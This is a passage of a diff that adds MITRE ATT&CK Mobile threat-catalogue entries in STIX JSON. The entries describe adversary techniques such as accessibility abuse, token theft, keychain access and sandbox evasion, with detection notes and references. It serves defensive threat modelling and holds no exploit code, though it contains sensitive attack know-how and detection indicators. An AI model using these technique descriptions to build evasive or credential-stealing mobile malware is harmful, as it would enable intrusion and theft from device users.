"https://www.skycure.com/blog/accessibility-clickjacking/", + "description": "Yair Amit. (2016, March 3). “Accessibility Clickjacking” – The Next Evolution in Android Malware that Impacts More Than 500 Million Devices. Retrieved December 21, 2016.", + "source_name": "Skycure-Accessibility" + }, + { + "description": "Lukáš Štefanko. (2018, December 11). Android Trojan steals money from PayPal accounts even with 2FA on. Retrieved July 11, 2019.", + "url": "https://www.welivesecurity.com/2018/12/11/android-trojan-steals-money-paypal-accounts-2fa/", + "source_name": "android-trojan-steals-paypal-2fa" + }, + { + "source_name": "banking-trojans-google-play", + "url": "https://www.welivesecurity.com/2018/10/24/banking-trojans-continue-surface-google-play/", + "description": "Lukáš Štefanko. (2018, October 24). Banking Trojans continue to surface on Google Play. Retrieved July 11, 2019." + } + ], + "modified": "2020-03-30T14:03:43.761Z", + "name": "Abuse Accessibility Features", + "description": "**This technique has been deprecated. Please use [Input Capture](https://attack.mitre.org/techniques/T1417), [Input Injection](https://attack.mitre.org/techniques/T1516), and [Input Prompt](https://attack.mitre.org/techniques/T1411) where appropriate.**\n\nA malicious app could abuse Android's accessibility features to capture sensitive data or perform other malicious actions.(Citation: Skycure-Accessibility)\n\nAdversaries may abuse accessibility features on Android to emulate a user's clicks, for example to steal money from a user's bank account.(Citation: android-trojan-steals-paypal-2fa)(Citation: banking-trojans-google-play)\n\nAdversaries may abuse accessibility features on Android devices to evade defenses by repeatedly clicking the \"Back\" button when a targeted app manager or mobile security app is launched, or when strings suggesting uninstallation are detected in the foreground. 
This effectively prevents the malicious application from being uninstalled.(Citation: android-trojan-steals-paypal-2fa)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "impact" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": true, + "x_mitre_version": "2.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-20T18:51:07.651Z", + "name": "Exploitation of Remote Services", + "description": "Adversaries may exploit remote services of enterprise servers, workstations, or other resources to gain unauthorized access to internal systems once inside of a network. Adversaries may exploit remote services by taking advantage of a mobile device’s access to an internal enterprise network through local connectivity or through a Virtual Private Network (VPN). Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system. \n\nAn adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Scanning](https://attack.mitre.org/techniques/T1423) or other Discovery methods. These look for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. 
Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.\n\nDepending on the permissions level of the vulnerable remote service, an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1404) as a result of lateral movement exploitation as well. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Detecting software exploitation initiated by a mobile device may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash.\n\nNetwork traffic analysis could reveal patterns of compromise if devices attempt to access unusual targets or resources. \n\nApplication vetting may be able to identify applications that perform Discovery or utilize existing connectivity to remotely access hosts within an internal enterprise network. 
", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.2", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--22379609-a99f-4a01-bd7e-70f3e105859d", + "created": "2017-10-25T14:48:13.259Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1428", + "external_id": "T1428" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-32.html", + "external_id": "APP-32" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "created": "2022-04-01T19:06:27.177Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1437.001", + "url": "https://attack.mitre.org/techniques/T1437/001" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-29.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-29" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may communicate using application layer protocols associated with web protocols traffic to avoid detection/network filtering by blending in with existing traffic. 
Commands to remote mobile devices, and often the results of those commands, will be embedded within the protocol traffic between the mobile client and server. \n\nWeb protocols such as HTTP and HTTPS are used for web traffic as well as well as notification services native to mobile messaging services such as Google Cloud Messaging (GCM) and newly, Firebase Cloud Messaging (FCM), (GCM/FCM: two-way communication) and Apple Push Notification Service (APNS; one-way server-to-device). Such notification services leverage HTTP/S via the respective API and are commonly abused on Android and iOS respectively in order blend in with routine device traffic making it difficult for enterprises to inspect. ", + "modified": "2022-04-06T13:07:45.661Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Web Protocols", + "x_mitre_detection": "Abuse of standard application protocols can be difficult to detect as many legitimate mobile applications leverage such protocols for language-specific APIs. Enterprises may be better served focusing on detection at other stages of adversarial behavior. ", + "kill_chain_phases": [ + { + "phase_name": "command-and-control", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": true, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:53:52.292Z", + "name": "Steal Application Access Token", + "description": "Adversaries can steal user application access tokens as a means of acquiring credentials to access remote systems and resources. This can occur through social engineering or URI hijacking and typically requires user action to grant access, such as through a system “Open With” dialogue. 
\n\nApplication access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework used to issue tokens to users for access to systems. An application desiring access to cloud-based services or protected APIs can gain entry through OAuth 2.0 using a variety of authorization protocols. An example of a commonly-used sequence is Microsoft's Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested without requiring user credentials.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "On Android, users may be presented with a popup to select the appropriate application to open a URI in. If the user sees an application they do not recognize, they can remove it. When vetting applications for potential security weaknesses, the vetting process could look for insecure use of Intents. Developers should be encouraged to use techniques to ensure that the intent can only be sent to an appropriate destination (e.g., use explicit rather than implicit intents, permission checking, checking of the destination app's signing certificate, or utilizing the App Links feature). 
For mobile applications using OAuth, encourage use of best practice.(Citation: IETF-OAuthNativeApps)(Citation: Android-AppLinks)", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--233fe2c0-cb41-4765-b454-e0087597fbce", + "created": "2022-04-01T15:12:50.740Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1635", + "external_id": "T1635" + }, + { + "source_name": "Android-AppLinks", + "description": "Android. (n.d.). Handling App Links. Retrieved December 21, 2016.", + "url": "https://developer.android.com/training/app-links/index.html" + }, + { + "source_name": "Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019", + "description": "Auth0. (n.d.). Why You Should Always Use Access Tokens to Secure APIs. Retrieved September 12, 2019.", + "url": "https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/" + }, + { + "source_name": "Microsoft - OAuth Code Authorization flow - June 2019", + "description": "Microsoft. (n.d.). Microsoft identity platform and OAuth 2.0 authorization code flow. Retrieved September 12, 2019.", + "url": "https://docs.microsoft.com/en-us/azure/active-directory/develop/v2-oauth2-auth-code-flow" + }, + { + "source_name": "Microsoft Identity Platform Protocols May 2019", + "description": "Microsoft. (n.d.). Retrieved September 12, 2019.", + "url": "https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols" + }, + { + "source_name": "IETF-OAuthNativeApps", + "description": "W. Denniss and J. Bradley. (2017, October). IETF RFC 8252: OAuth 2.0 for Native Apps. 
Retrieved November 30, 2018.", + "url": "https://tools.ietf.org/html/rfc8252" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--24a77e53-0751-46fc-b207-99378fb35c08", + "created": "2022-04-11T20:05:56.069Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1628.002", + "url": "https://attack.mitre.org/techniques/T1628/002" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may attempt to avoid detection by hiding malicious behavior from the user. By doing this, an adversary’s modifications would most likely remain installed on the device for longer, allowing the adversary to continue to operate on that device. \n\nWhile there are many ways this can be accomplished, one method is by using the device’s sensors. By utilizing the various motion sensors on a device, such as accelerometer or gyroscope, an application could detect that the device is being interacted with. That way, the application could continue to run while the device is not in use but cease operating while the user is using the device, hiding anything that would indicate malicious activity was ongoing. Accessing the sensors in this way does not require any permissions from the user, so it would be completely transparent.", + "modified": "2022-04-11T20:05:56.069Z", + "name": "User Evasion", + "x_mitre_detection": "Mobile security products may be able to detect some forms of user evasion. 
Otherwise, the act of hiding malicious activity could be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "phase_name": "defense-evasion", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": true, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:37:57.884Z", + "name": "Virtualization/Sandbox Evasion", + "description": "Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors after checking for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware’s behavior to disengage from the victim or conceal the core functions of the payload. They may also search for VME artifacts before dropping further payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1633) during automated discovery to shape follow-on behaviors. \n\nAdversaries may use several methods to accomplish [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1633) such as checking for system artifacts associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help determine if it is in an analysis environment. 
", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services could look for applications attempting to get `android.os.SystemProperties` or `getprop` with the runtime `exec()` commands. This could indicate some level of sandbox evasion, as Google recommends against using system properties within applications.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--27d18e87-8f32-4be1-b456-39b90454360f", + "created": "2022-03-30T17:51:29.550Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1633", + "external_id": "T1633" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--27f483c6-6666-44fa-8532-ffd5fc7dab38", + "created": "2020-06-24T17:33:49.778Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1579", + "url": "https://attack.mitre.org/techniques/T1579" + }, + { + "source_name": "Apple Keychain Services", + "url": "https://developer.apple.com/documentation/security/keychain_services", + "description": "Apple, Inc.. (n.d.). Keychain Services. Retrieved June 24, 2020." 
+ }, + { + "source_name": "Elcomsoft Decrypt Keychain", + "url": "https://blog.elcomsoft.com/2018/12/six-ways-to-decrypt-iphone-passwords-from-the-keychain/", + "description": "V. Katalov. (2018, December 18). Six Ways to Decrypt iPhone Passwords from the Keychain. Retrieved June 24, 2020." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-11.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "AUT-11" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "Adversaries may collect the keychain storage data from an iOS device to acquire credentials. Keychains are the built-in way for iOS to keep track of users' passwords and credentials for many services and features such as Wi-Fi passwords, websites, secure notes, certificates, private keys, and VPN credentials.\n\nOn the device, the keychain database is stored outside of application sandboxes to prevent unauthorized access to the raw data. Standard iOS APIs allow applications access to their own keychain contained within the database. 
By utilizing a privilege escalation exploit or existing root access, an adversary can access the entire encrypted database.(Citation: Apple Keychain Services)(Citation: Elcomsoft Decrypt Keychain)", + "modified": "2022-04-01T15:02:43.470Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Keychain", + "x_mitre_detection": "Mobile security products can potentially detect jailbroken devices and perform further actions as necessary.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--29e07491-8947-43a3-8d4e-9a787c45f3d3", + "created": "2017-10-25T14:48:17.176Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1413", + "url": "https://attack.mitre.org/techniques/T1413" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-3.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-3" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-13" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "On versions of Android prior to 4.1, an adversary may use a malicious application that holds the READ_LOGS permission to obtain private keys, passwords, other credentials, or other sensitive data stored in the device's system log. 
On Android 4.1 and later, an adversary would need to attempt to perform an operating system privilege escalation attack to be able to access the log.", + "modified": "2022-04-06T15:37:34.463Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Access Sensitive Data in Device Logs", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T15:16:19.547Z", + "name": "Command and Scripting Interpreter", + "description": "Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, Android is a UNIX-like OS and includes a basic [Unix Shell](https://attack.mitre.org/techniques/T1623/001) that can be accessed via the Android Debug Bridge (ADB) or Java’s `Runtime` package.\n\nAdversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0027) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells. 
", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "execution" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Command-line activities can potentially be detected through Mobile Threat Defense integrations with lower-level OS APIs. This could grant the MTD agents access to running processes and their parameters, potentially detecting unwanted or malicious shells.\n\nApplication vetting services could detect the invocations of methods that could be used to execute shell commands.(Citation: Samsung Knox Mobile Threat Defense)", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--29f1f56c-7b7a-4c14-9e39-59577ea2743c", + "created": "2022-03-30T13:40:37.259Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1623", + "external_id": "T1623" + }, + { + "source_name": "Samsung Knox Mobile Threat Defense", + "description": "Samsung Knox Partner Program. (n.d.). Knox for Mobile Threat Defense. Retrieved March 30, 2022.", + "url": "https://partner.samsungknox.com/mtd" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:40:12.912Z", + "name": "Disable or Modify Tools", + "description": "Adversaries may disable security tools to avoid potential detection of their tools and activities. 
This can take the form of disabling security software, modifying SELinux configuration, or other methods to interfere with security tools scanning or reporting information. This is typically done by abusing device administrator permissions or using system exploits to gain root access to the device to modify protected system files.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Users can view a list of active device administrators in the device settings.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--2aa78dfd-cb6f-4c70-9408-137cfd96be49", + "created": "2022-04-01T18:51:13.963Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1629/003", + "external_id": "T1629.003" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:43:44.687Z", + "name": "Ingress Tool Transfer", + "description": "Adversaries may transfer tools or other files from an external system onto a compromised device to facilitate follow-on actions. 
Files may be copied from an external adversary-controlled system through the command and control channel or through alternate protocols with another tool such as FTP.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services could look for connections to unknown domains or IP addresses. Application vetting services may indicate precisely what content was requested during application execution.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "2.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--2bb20118-e6c0-41dc-a07c-283ea4dd0fb8", + "created": "2020-01-21T15:27:30.182Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1544", + "external_id": "T1544" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--2ccc3d39-9598-4d32-9657-42e1c7095d26", + "created": "2022-04-05T19:57:15.734Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1637", + "url": "https://attack.mitre.org/techniques/T1637" + }, + { + "source_name": "Data Driven Security DGA", + "url": "https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/", + 
"description": "Jacobs, J. (2014, October 2). Building a DGA Classifier: Part 2, Feature Engineering. Retrieved February 18, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. This algorithm can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.", + "modified": "2022-04-05T19:57:15.734Z", + "name": "Dynamic Resolution", + "x_mitre_detection": "Detecting dynamically generated domains can be challenging due to the number of different Domain Generation Algorithms (DGAs), constantly evolving malware families, and the increasing complexity of the algorithms. There are a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) Content delivery network (CDN) domains may trigger these detections due to the format of their domain names. 
In addition to detecting a DGA domain based on the name, a more general approach for detecting a suspicious domain is to check for recently registered names or rarely visited domains.", + "kill_chain_phases": [ + { + "phase_name": "command-and-control", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--2d646840-f6f5-4619-a5a8-29c8316bbac5", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1477", + "url": "https://attack.mitre.org/techniques/T1477" + }, + { + "source_name": "Forbes-iPhoneSMS", + "url": "http://www.forbes.com/2009/07/28/hackers-iphone-apple-technology-security-hackers.html", + "description": "Andy Greenberg. (2009, July 28). How to Hijack 'Every iPhone In The World'. Retrieved December 23, 2016." + }, + { + "source_name": "Register-BaseStation", + "url": "http://www.theregister.co.uk/2015/11/12/mobile_pwn2own1/", + "description": "D. Pauli. (2015, November 12). Samsung S6 calls open to man-in-the-middle base station snooping. Retrieved December 23, 2016." + }, + { + "source_name": "ProjectZero-BroadcomWiFi", + "url": "https://googleprojectzero.blogspot.com/2017/04/over-air-exploiting-broadcoms-wi-fi_4.html", + "description": "Gal Beniamini. (2017, April 4). Over The Air: Exploiting Broadcom's Wi-Fi Stack. Retrieved November 8, 2018." 
+ }, + { + "source_name": "Weinmann-Baseband", + "url": "https://www.usenix.org/system/files/conference/woot12/woot12-final24.pdf", + "description": "R. Weinmann. (2012, August 6-7). Baseband Attacks: Remote Exploitation of Memory Corruptions in Cellular Protocol Stacks. Retrieved December 23, 2016." + }, + { + "source_name": "SRLabs-SIMCard", + "url": "https://srlabs.de/bites/rooting-sim-cards/", + "description": "SRLabs. (n.d.). SIM cards are prone to remote hacking. Retrieved December 23, 2016." + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "The mobile device may be targeted for exploitation through its interface to cellular networks or other radio interfaces.\n\n### Baseband Vulnerability Exploitation\n\nA message sent over a radio interface (typically cellular, but potentially Bluetooth, GPS, NFC, Wi-Fi(Citation: ProjectZero-BroadcomWiFi) or other) to the mobile device could exploit a vulnerability in code running on the device(Citation: Register-BaseStation)(Citation: Weinmann-Baseband).\n\n### Malicious SMS Message\n\nAn SMS message could contain content designed to exploit vulnerabilities in the SMS parser on the receiving device(Citation: Forbes-iPhoneSMS). An SMS message could also contain a link to a web site containing malicious content designed to exploit the device web browser. 
Vulnerable SIM cards may be remotely exploited and reprogrammed via SMS messages(Citation: SRLabs-SIMCard).", + "modified": "2022-04-06T15:42:13.444Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Exploit via Radio Interfaces", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--2de38279-043e-47e8-aaad-1b07af6d0790", + "created": "2017-10-25T14:48:26.890Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1423", + "url": "https://attack.mitre.org/techniques/T1423" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans from the mobile device. 
This technique may take advantage of the mobile device's access to an internal enterprise network either through local connectivity or through a Virtual Private Network (VPN).", + "modified": "2022-04-11T19:12:38.451Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Network Service Scanning", + "x_mitre_detection": "Network service scanning can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "phase_name": "discovery", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--2f0e8d80-4b8b-4f4a-b5cc-132afe7e057d", + "created": "2021-09-30T18:18:52.285Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1618", + "url": "https://attack.mitre.org/techniques/T1618" + } + ], + 